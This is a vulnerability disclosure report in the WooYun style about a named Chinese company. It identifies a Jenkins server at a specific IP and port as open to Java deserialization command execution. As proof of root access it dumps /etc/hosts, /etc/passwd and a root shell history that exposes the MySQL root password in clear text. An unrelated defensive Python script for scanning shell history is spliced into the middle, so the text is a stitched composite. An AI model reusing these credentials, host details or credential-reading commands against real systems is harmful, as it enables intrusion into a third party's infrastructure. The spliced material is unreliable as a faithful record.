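2016-04-08: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-23: The vendor has actively ignored the vulnerability; details disclosed to the public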
www.sudiyi.cn
www.sudiyi.cn
http://112.124.60.190:8081/login?from=%2fjenkins Java deserialization command execution
127.0.0.1 localhost
127.0.0.1 devops01.sudiyi.cn
127.0.1.1 localhost.localdomain localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.168.208.86 iZ23vcyqu9dZ
10.160.62.232 iZ23dtey008Z
# For Jenkins Update
199.193.196.24 mirrors.jenkins-ci.org
10.168.66.248 ruby.sudiyi.cn
# For jenkins integrate to jira server
127.0.0.1 jira.sudiyi.cn
140.211.11.131 archive.apache.org
54.230.125.6 downloads.gradle.org
# For jenkins to reach maven repo
127.0.0.1 maven.sudiyi.cn
# Temporarily disable loading of dl-ssl.google.com
#127.0.0.1 dl-ssl.google.com
Root privileges
cat /root/.bash_history
MySQL password
history|grep mysql
mysql -u root -p sdY10055
mysql -u root -psdY10055
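The history lines above show a MySQL root password typed as a command-line argument, which leaves it readable in /root/.bash_history. As an added example (not part of the original report), this Python check flags such entries in a history file and redacts the value. The function name find_cli_passwords, the client list and the sample lines are assumptions constructed for illustration.

```python
import shlex

# MySQL-family clients that take -p[password] / --password=... (assumed list; extend as needed)
CLIENTS = {"mysql", "mysqldump", "mysqladmin"}

def find_cli_passwords(history_lines):
    """Return (line_no, kind, redacted_command) for entries that expose or may expose a password."""
    findings = []
    for no, line in enumerate(history_lines, 1):
        try:
            argv = shlex.split(line)
        except ValueError:              # unbalanced quotes: fall back to a plain split
            argv = line.split()
        # Locate the client anywhere on the line (covers "sudo mysql ..." and pipelines).
        start = next((i for i, t in enumerate(argv)
                      if t.rsplit("/", 1)[-1] in CLIENTS), None)
        if start is None:
            continue
        for i in range(start + 1, len(argv)):
            arg, kind = argv[i], None
            if arg.startswith("--password=") and arg != "--password=":
                kind, argv[i] = "inline", "--password=<redacted>"
            elif arg.startswith("-p") and len(arg) > 2:
                # -p<value> with no space is how the client takes an inline password
                kind, argv[i] = "inline", "-p<redacted>"
            elif arg == "-p" and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
                # After a bare -p the client prompts and reads the next token as a
                # database name; it may equally be a password typed by mistake.
                kind, argv[i + 1] = "review", "<redacted>"
            if kind:
                findings.append((no, kind, " ".join(argv)))
                break
    return findings

# Constructed sample history (placeholder secrets, not values from the report)
SAMPLE_HISTORY = [
    "history|grep mysql",
    "mysql -u root -p ExamplePw1",
    "mysql -u root -pExamplePw1",
    "mysqldump --user=backup --password=ExamplePw2 appdb",
    "mysql -u root -p",
    "ls -la /tmp",
]

if __name__ == "__main__":
    for no, kind, cmd in find_cli_passwords(SAMPLE_HISTORY):
        print(f"line {no}: {kind}: {cmd}")
```

Entries marked "review" need a human look, because the token after a bare -p can be a legitimate database name.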
Some CDN information
cd /tmp/
weget 'http://203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130b?bkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm'
wegt 'http://203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130b?bkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm'
Root directory
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:109::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
live:x:1000:1000:,,,:/home/live:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
nginx:x:106:115:nginx user,,,:/nonexistent:/bin/false
parsoid:x:107:116::/usr/lib/parsoid:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
jenkins:x:109:119:Jenkins,,,:/var/lib/jenkins:/bin/bash
sdyops:x:1001:1001::/home/sdyops:/bin/bash
jira:x:1002:1002:Atlassian JIRA:/home/jira:
jira1:x:1003:1003:Atlassian JIRA:/home/jira1:
jira2:x:1004:1004:Atlassian JIRA:/home/jira2:
jira3:x:1005:1005:Atlassian JIRA:/home/jira3:
jira4:x:1006:1006:Atlassian JIRA:/home/jira4:
confluence:x:1007:1007:Atlassian Confluence:/home/confluence:
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)